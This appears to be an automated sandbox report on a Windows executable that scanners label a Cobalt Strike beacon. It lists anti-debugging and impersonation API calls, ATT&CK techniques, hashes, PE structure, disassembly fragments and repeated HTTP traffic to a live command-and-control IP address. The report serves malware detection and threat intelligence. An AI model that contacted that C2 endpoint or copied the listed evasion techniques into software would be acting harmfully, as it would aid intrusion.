        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D6970E _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,1_2_00D6970E
        Source: beacon_x86.exe, 00000001.00000002.3879604873.000000000071F000.00000004.00000020.00020000.00000000.sdmp, beacon_x86.exe, 00000001.00000002.3879604873.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, beacon_x86.exe, 00000001.00000003.2770287590.000000000073A000.00000004.00000020.00020000.00000000.sdmp, beacon_x86.exe, 00000001.00000003.2770287590.000000000071F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\beacon_x86.exeAPI call chain: ExitProcess graph end nodegraph_1-21022

        Anti Debugging

        barindex
        Source: C:\Users\user\Desktop\beacon_x86.exeProcess Stats: CPU usage > 42% for more than 60s
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D7762B LdrInitializeThunk,1_2_00D7762B
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D88375 IsDebuggerPresent,_RTC_GetSrcLine,DebugBreak,1_2_00D88375
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D611D8 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00D611D8
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_3_0081ACAE mov eax, dword ptr fs:[00000030h]1_3_0081ACAE
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_3_00819FDE mov eax, dword ptr fs:[00000030h]1_3_00819FDE
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D681C2 DeleteProcThreadAttributeList,GetProcessHeap,HeapFree,1_2_00D681C2
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_0040116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,1_2_0040116C
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00401A5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,1_2_00401A5C
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00401A60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,1_2_00401A60
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00401160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,1_2_00401160
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_004013C1 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,1_2_004013C1
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_004011A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,1_2_004011A3
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D81950 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D81950
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D7F331 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00D7F331
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D7B4B2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00D7B4B2
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D6D272 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,1_2_00D6D272
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D6D442 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00D6D442
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: GetLocaleInfoA,1_2_00D84EF0
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_0040161C CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,1_2_0040161C
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_004019A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_004019A0
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D66F09 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,1_2_00D66F09
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D66F09 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,1_2_00D66F09
        Source: C:\Users\user\Desktop\beacon_x86.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: beacon_x86.exe, type: SAMPLE
        Source: Yara matchFile source: 1.0.beacon_x86.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.beacon_x86.exe.400000.0.unpack, type: UNPACKEDPE
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D675B7 socket,htons,ioctlsocket,closesocket,bind,listen,1_2_00D675B7
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D6DDB3 socket,closesocket,htons,bind,listen,1_2_00D6DDB3
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D67699 htonl,htons,socket,closesocket,bind,ioctlsocket,1_2_00D67699
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure2
        Valid Accounts
        2
        Native API
        2
        Valid Accounts
        2
        Valid Accounts
        2
        Valid Accounts
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        2
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        DLL Side-Loading
        21
        Access Token Manipulation
        111
        Virtualization/Sandbox Evasion
        LSASS Memory121
        Security Software Discovery
        Remote Desktop ProtocolData from Removable Media2
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Process Injection
        21
        Access Token Manipulation
        Security Account Manager111
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading
        1
        Process Injection
        NTDS1
        Process Discovery
        Distributed Component Object ModelInput Capture111
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information
        LSA Secrets1
        Application Window Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
        Obfuscated Files or Information
        Cached Domain Credentials1
        Account Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading
        DCSync1
        System Owner/User Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
        File and Directory Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow14
        System Information Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        beacon_x86.exe95%ReversingLabsWin32.Trojan.CobaltStrike
        beacon_x86.exe79%VirustotalBrowse
        beacon_x86.exe100%AviraHEUR/AGEN.1344233
        beacon_x86.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://8.148.6.140/api/v1/getyU0%Avira URL Cloudsafe
        http://8.148.6.140/api/v1/gety0%Avira URL Cloudsafe
        http://8.148.6.140/api/v1/get0%Avira URL Cloudsafe
        8.148.6.1400%Avira URL Cloudsafe
        http://8.148.6.140/api/v1/getBase0%Avira URL Cloudsafe
        http://8.148.6.140/api/v1/get%0%Avira URL Cloudsafe
        No contacted domains info
        NameMaliciousAntivirus DetectionReputation
        8.148.6.140true
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/gettrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://8.148.6.140/api/v1/getyUbeacon_x86.exe, 00000001.00000002.3879604873.000000000071F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/getBasebeacon_x86.exe, 00000001.00000003.2770287590.000000000071F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/get%beacon_x86.exe, 00000001.00000003.2770287590.000000000071F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/getybeacon_x86.exe, 00000001.00000002.3879604873.000000000071F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        8.148.6.140
        unknownSingapore
        37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
        Joe Sandbox version:42.0.0 Malachite
        Analysis ID:1587368
        Start date and time:2025-01-10 09:25:12 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 6m 35s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:7
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:beacon_x86.exe
        Detection:MAL
        Classification:mal96.troj.evad.winEXE@1/0@0/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 34
        • Number of non-executed functions: 90
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Override analysis time to 240000 for current running targets taking high CPU consumption
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 23.206.229.226
        • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtDeviceIoControlFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        03:26:10API Interceptor9895454x Sleep call for process: beacon_x86.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        8.148.6.140beacon_x64.exeGet hashmaliciousCobaltStrikeBrowse
        • 8.148.6.140/api/v1/get
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdbeacon_x64.exeGet hashmaliciousCobaltStrikeBrowse
        • 8.148.6.140
        2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
        • 118.178.60.103
        armv5l.elfGet hashmaliciousUnknownBrowse
        • 47.116.93.193
        3.elfGet hashmaliciousUnknownBrowse
        • 47.113.16.150
        armv7l.elfGet hashmaliciousUnknownBrowse
        • 8.181.124.11
        THsSNYblMw.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
        • 47.121.190.121
        Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
        • 139.242.78.130
        Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
        • 47.114.96.229
        Fantazy.mips.elfGet hashmaliciousUnknownBrowse
        • 8.140.140.254
        k2vUsu5VZ5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
        • 47.121.190.121
        No context
        No context
        No created / dropped files found
        File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Entropy (8bit):6.777438348295706
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • VXD Driver (31/22) 0.00%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:beacon_x86.exe
        File size:324'096 bytes
        MD5:bffe5dbe4d4ececc6652360ce37b8075
        SHA1:9e3ccfe33a88fd70ba6b5ac8f72b3bc0c760e798
        SHA256:c86426eeb24a042903b302c21513defb1e61535fc008b7c9e847113ddb798666
        SHA512:a57a54cdc9411288b0058d90bd942c8954c40e184be11e8d4296355466f466bba111d845a3b906835f3755e204e7d7fe0977b9da989ea2050040654fa66019d3
        SSDEEP:6144:E1Qdv/pgihi5cFPr8OstxsUvuTHNPbNKuXjlM6SKj:Wi/pgOYXOtpHNPbNlXjqe
        TLSH:0864CF6FA432C8E7C8FD71F01AC763AFA5AE127C5885CA7AD74EF094F421B045E84592
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......................".....................0....@..........................@................ ............................
        Icon Hash:00928e8e8686b000
        Entrypoint:0x4014a0
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
        DLL Characteristics:
        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
        TLS Callbacks:0x401b40, 0x401af0
        CLR (.Net) Version:
        OS Version Major:4
        OS Version Minor:0
        File Version Major:4
        File Version Minor:0
        Subsystem Version Major:4
        Subsystem Version Minor:0
        Import Hash:f6243a15fa8eee8ee96b5e1144d461f6
        Instruction
        sub esp, 0Ch
        mov dword ptr [00450394h], 00000001h
        call 00007F2550AFA963h
        add esp, 0Ch
        jmp 00007F2550AFA11Bh
        lea esi, dword ptr [esi+00000000h]
        sub esp, 0Ch
        mov dword ptr [00450394h], 00000000h
        call 00007F2550AFA943h
        add esp, 0Ch
        jmp 00007F2550AFA0FBh
        lea esi, dword ptr [esi+00000000h]
        sub esp, 1Ch
        mov eax, dword ptr [esp+20h]
        mov dword ptr [esp], eax
        call 00007F2550AFB8EAh
        test eax, eax
        sete al
        add esp, 1Ch
        movzx eax, al
        neg eax
        ret
        nop
        nop
        nop
        push ebp
        mov ebp, esp
        sub esp, 18h
        mov dword ptr [esp], 00401520h
        call 00007F2550AFA443h
        leave
        ret
        lea esi, dword ptr [esi+00000000h]
        lea esi, dword ptr [esi+00h]
        nop
        ret
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        push ebp
        mov ebp, esp
        mov eax, dword ptr [ebp+08h]
        pop ebp
        jmp eax
        push ebp
        mov edx, dword ptr [0040302Ch]
        mov ebp, esp
        mov eax, dword ptr [ebp+08h]
        test edx, edx
        jle 00007F2550AFA493h
        cmp dword ptr [00403030h], 00000000h
        jle 00007F2550AFA48Ah
        mov ecx, dword ptr [00451148h]
        mov dword ptr [eax+edx], ecx
        mov ecx, dword ptr [0045114Ch]
        mov edx, dword ptr [00403030h]
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x510000x644.idata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x4f0300x18.rdata
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x5111c0xe0.idata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000x1a440x1c0078084e5ca85835392a463f62abd5746cFalse0.5334821428571429data5.700340700341032IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .data0x30000x4bc6c0x4be00d09fab49fa7c820bc22a7bf525cb270cFalse0.5702063169275123dBase III DBT, version number 0, next free block index 10, 1st item "\340\334\253\212\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+#\346\334\017\220\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334\037\313\210\227E\277\344\334\376\002\346\334+\203\344\334+\001\346\334+\227\344\334+\223\344\334+\223\344\334+\223\344\334\013\223\344\274\037"6.802458719813997IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rdata0x4f0000x6340x800667441c840a2c3ea7e1291acd47bf4c5False0.2275390625data4.495993508967327IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
        .bss0x500000x4280x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .idata0x510000x6440x8007d72908e4c68f22d444c4e664d88dda3False0.3544921875data4.2935353496828945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .CRT0x520000x340x200a09a5f5fb4593e99cd0076e5f2fcec2eFalse0.072265625Matlab v4 mat-file (little endian) \200\031@, numeric, rows 4198688, columns 00.2711142780062829IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .tls0x530000x80x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        DLLImport
        KERNEL32.dllCloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile
        msvcrt.dll__getmainargs, __initenv, __lconv_init, __p__acmdln, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _initterm, _iob, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf
        TimestampSource PortDest PortSource IPDest IP
        Jan 10, 2025 09:26:12.418658972 CET4970680192.168.2.88.148.6.140
        Jan 10, 2025 09:26:12.423535109 CET80497068.148.6.140192.168.2.8
        Jan 10, 2025 09:26:12.423621893 CET4970680192.168.2.88.148.6.140
        Jan 10, 2025 09:26:12.423816919 CET4970680192.168.2.88.148.6.140
        Jan 10, 2025 09:26:12.428631067 CET80497068.148.6.140192.168.2.8
        Jan 10, 2025 09:26:13.407344103 CET80497068.148.6.140192.168.2.8
        Jan 10, 2025 09:26:13.407361984 CET80497068.148.6.140192.168.2.8
        Jan 10, 2025 09:26:13.407464981 CET4970680192.168.2.88.148.6.140
        Jan 10, 2025 09:26:13.410254002 CET4970680192.168.2.88.148.6.140
        Jan 10, 2025 09:26:13.415031910 CET80497068.148.6.140192.168.2.8
        Jan 10, 2025 09:26:13.523662090 CET4970780192.168.2.88.148.6.140
        Jan 10, 2025 09:26:13.528491020 CET80497078.148.6.140192.168.2.8
        Jan 10, 2025 09:26:13.528577089 CET4970780192.168.2.88.148.6.140
        Jan 10, 2025 09:26:13.528750896 CET4970780192.168.2.88.148.6.140
        Jan 10, 2025 09:26:13.534245014 CET80497078.148.6.140192.168.2.8
        Jan 10, 2025 09:26:17.519165039 CET80497078.148.6.140192.168.2.8
        Jan 10, 2025 09:26:17.519221067 CET80497078.148.6.140192.168.2.8
        Jan 10, 2025 09:26:17.519237995 CET4970780192.168.2.88.148.6.140
        Jan 10, 2025 09:26:17.519279957 CET4970780192.168.2.88.148.6.140
        Jan 10, 2025 09:26:17.519490004 CET4970780192.168.2.88.148.6.140
        Jan 10, 2025 09:26:17.524352074 CET80497078.148.6.140192.168.2.8
        Jan 10, 2025 09:26:17.634732008 CET4970880192.168.2.88.148.6.140
        Jan 10, 2025 09:26:17.639842987 CET80497088.148.6.140192.168.2.8
        Jan 10, 2025 09:26:17.639990091 CET4970880192.168.2.88.148.6.140
        Jan 10, 2025 09:26:17.644833088 CET4970880192.168.2.88.148.6.140
        Jan 10, 2025 09:26:17.649698019 CET80497088.148.6.140192.168.2.8
        Jan 10, 2025 09:26:18.610219955 CET80497088.148.6.140192.168.2.8
        Jan 10, 2025 09:26:18.610313892 CET4970880192.168.2.88.148.6.140
        Jan 10, 2025 09:26:18.610388041 CET80497088.148.6.140192.168.2.8
        Jan 10, 2025 09:26:18.610440969 CET4970880192.168.2.88.148.6.140
        Jan 10, 2025 09:26:18.610508919 CET4970880192.168.2.88.148.6.140
        Jan 10, 2025 09:26:18.615298033 CET80497088.148.6.140192.168.2.8
        Jan 10, 2025 09:26:18.726469994 CET4970980192.168.2.88.148.6.140
        Jan 10, 2025 09:26:18.731450081 CET80497098.148.6.140192.168.2.8
        Jan 10, 2025 09:26:18.731591940 CET4970980192.168.2.88.148.6.140
        Jan 10, 2025 09:26:18.731815100 CET4970980192.168.2.88.148.6.140
        Jan 10, 2025 09:26:18.736861944 CET80497098.148.6.140192.168.2.8
        Jan 10, 2025 09:26:19.700913906 CET80497098.148.6.140192.168.2.8
        Jan 10, 2025 09:26:19.700932980 CET80497098.148.6.140192.168.2.8
        Jan 10, 2025 09:26:19.701016903 CET4970980192.168.2.88.148.6.140
        Jan 10, 2025 09:26:19.701184988 CET4970980192.168.2.88.148.6.140
        Jan 10, 2025 09:26:19.705955982 CET80497098.148.6.140192.168.2.8
        Jan 10, 2025 09:26:19.804693937 CET4971080192.168.2.88.148.6.140
        Jan 10, 2025 09:26:19.809761047 CET80497108.148.6.140192.168.2.8
        Jan 10, 2025 09:26:19.809859991 CET4971080192.168.2.88.148.6.140
        Jan 10, 2025 09:26:19.809997082 CET4971080192.168.2.88.148.6.140
        Jan 10, 2025 09:26:19.814779043 CET80497108.148.6.140192.168.2.8
        Jan 10, 2025 09:26:20.779411077 CET80497108.148.6.140192.168.2.8
        Jan 10, 2025 09:26:20.779479980 CET80497108.148.6.140192.168.2.8
        Jan 10, 2025 09:26:20.779582977 CET4971080192.168.2.88.148.6.140
        Jan 10, 2025 09:26:20.782780886 CET4971080192.168.2.88.148.6.140
        Jan 10, 2025 09:26:20.787589073 CET80497108.148.6.140192.168.2.8
        Jan 10, 2025 09:26:20.920605898 CET4971180192.168.2.88.148.6.140
        Jan 10, 2025 09:26:20.925579071 CET80497118.148.6.140192.168.2.8
        Jan 10, 2025 09:26:20.925666094 CET4971180192.168.2.88.148.6.140
        Jan 10, 2025 09:26:20.929698944 CET4971180192.168.2.88.148.6.140
        Jan 10, 2025 09:26:20.934518099 CET80497118.148.6.140192.168.2.8
        Jan 10, 2025 09:26:21.920200109 CET80497118.148.6.140192.168.2.8
        Jan 10, 2025 09:26:21.920278072 CET4971180192.168.2.88.148.6.140
        Jan 10, 2025 09:26:21.920341015 CET80497118.148.6.140192.168.2.8
